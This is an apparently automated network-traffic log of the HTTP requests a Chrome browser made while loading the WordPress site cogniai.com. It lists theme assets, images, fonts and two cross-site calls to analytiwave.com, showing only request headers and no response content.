Source: global traffic HTTP traffic detected: 16 same-origin sub-resource requests to host cogniai.com. Each carries the same client headers as the document request above (sec-ch-ua, sec-ch-ua-mobile, sec-ch-ua-platform, user-agent, accept-encoding, accept-language) plus sec-fetch-site: same-origin, sec-fetch-mode: no-cors and referer: https://cogniai.com/. Header order as sent: host, sec-ch-ua-platform, user-agent, sec-ch-ua, sec-ch-ua-mobile, accept, sec-fetch-site, sec-fetch-mode, sec-fetch-dest, referer, accept-encoding, accept-language, priority. The accept header follows the destination: style -> text/css,*/*;q=0.1; image -> image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8; script -> */*.
    GET /wp-includes/css/dist/block-library/style.min.css?ver=6.8.1 HTTP/1.1                        sec-fetch-dest: style    priority: u=0
    GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.8 HTTP/1.1                 sec-fetch-dest: style    priority: u=0
    GET /wp-content/plugins/elementor/assets/lib/swiper/v8/css/swiper.min.css?ver=8.4.5 HTTP/1.1    sec-fetch-dest: style    priority: u=0
    GET /wp-content/themes/techze/css/fancybox.min.css?ver=1 HTTP/1.1                               sec-fetch-dest: style    priority: u=0
    GET /wp-content/themes/techze/css/icon-font.css?ver=1 HTTP/1.1                                  sec-fetch-dest: style    priority: u=0
    GET /wp-content/themes/techze/css/bootstrap.min.css?ver=1 HTTP/1.1                              sec-fetch-dest: style    priority: u=0
    GET /wp-content/themes/techze/css/style.css?ver=1 HTTP/1.1                                      sec-fetch-dest: style    priority: u=0
    GET /wp-content/themes/techze/css/odometer.min.css?ver=1 HTTP/1.1                               sec-fetch-dest: style    priority: u=0
    GET /wp-content/themes/techze/custom.css?ver=1 HTTP/1.1                                         sec-fetch-dest: style    priority: u=0
    GET /wp-content/themes/techze/css/flaticon.css?ver=1 HTTP/1.1                                   sec-fetch-dest: style    priority: u=0
    GET /wp-content/uploads/2023/11/thumb_COGNIAI-Concept9-FF-01-1.png HTTP/1.1                     sec-fetch-dest: image    priority: u=2, i
    GET /wp-content/uploads/2023/09/sptech1-1-1.png HTTP/1.1                                        sec-fetch-dest: image    priority: u=1, i
    GET /wp-content/uploads/2023/11/COGNIAI-Concept9-FF-01.png HTTP/1.1                             sec-fetch-dest: image    priority: u=2, i
    GET /wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.8 HTTP/1.1                sec-fetch-dest: script   priority: u=1
    GET /wp-content/uploads/2023/09/techze-about-76.png HTTP/1.1                                    sec-fetch-dest: image    priority: u=2, i
    GET /wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.8 HTTP/1.1                    sec-fetch-dest: script   priority: u=2
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/09/sptech1-1-1.png HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/techze/js/team.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /wp-content/themes/techze/js/jquery.min.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/11/thumb_COGNIAI-Concept9-FF-01-1.png HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/techze/js/fancybox.min.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /wp-content/themes/techze/js/odometer.min.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /wp-content/themes/techze/js/wow.min.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /wp-content/themes/techze/js/swiper.min.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /s/outfit/v11/QGYyz_MVcBeNP4NjuGObqx1XmO1I4TC1O4a0Ew.woff2 HTTP/1.1host: fonts.gstatic.comorigin: https://cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CIS2yQEIpbbJAQipncoBCIb0ygEIlaHLAQiKo8sBCIWgzQE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: fontreferer: https://fonts.googleapis.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /wp-content/themes/techze/js/scripts.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /wp-content/themes/techze/js/3d.jquery.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /wp-content/themes/techze/js/magnific.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /wp-content/themes/techze/js/pointer.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /wp-content/themes/techze/js/mag.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/09/slider-techze-12-1.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/09/slider-techze-13-1.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/techze/js/yukari-cik.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/11/COGNIAI-Concept9-FF-01.png HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/09/techze-about-76.png HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/techze/custom.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic HTTP traffic detected: GET /releases/v5.15.4/css/free-v4-font-face.min.css?token=e8bbb49528 HTTP/1.1host: ka-f.fontawesome.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://cogniai.comsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /releases/v5.15.4/css/free-v4-shims.min.css?token=e8bbb49528 HTTP/1.1host: ka-f.fontawesome.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://cogniai.comsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /releases/v5.15.4/css/free.min.css?token=e8bbb49528 HTTP/1.1host: ka-f.fontawesome.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://cogniai.comsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/09/slider-techze-12-1.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/09/slider-techze-13-1.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/09/ss2-1.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/09/cyberpunk-illustration-with-neon-colors-futuristic-technology-1-scaled.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /api/getUrl HTTP/1.1host: analytiwave.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://cogniai.comsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/09/ss3-1.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/09/ss4-1-1.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/09/projects-ai-1.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/09/projects-ai-2.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2022/12/small-project-3.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /api/getUrl HTTP/1.1host: analytiwave.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://cogniai.comsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9if-none-match: W/"34-2HFKtX0T3kgSM93i0ueL4WdTadg"priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2022/12/small-project-4.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2022/12/small-project-5.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/11/OpenAI-Logo-PNG.png HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/11/pngwing.com-1.png HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/11/google-logo-9831.png HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/11/SNOW_BIG.png HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/11/62067060d7b91b0004122615.png HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?ver=6.8.1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9
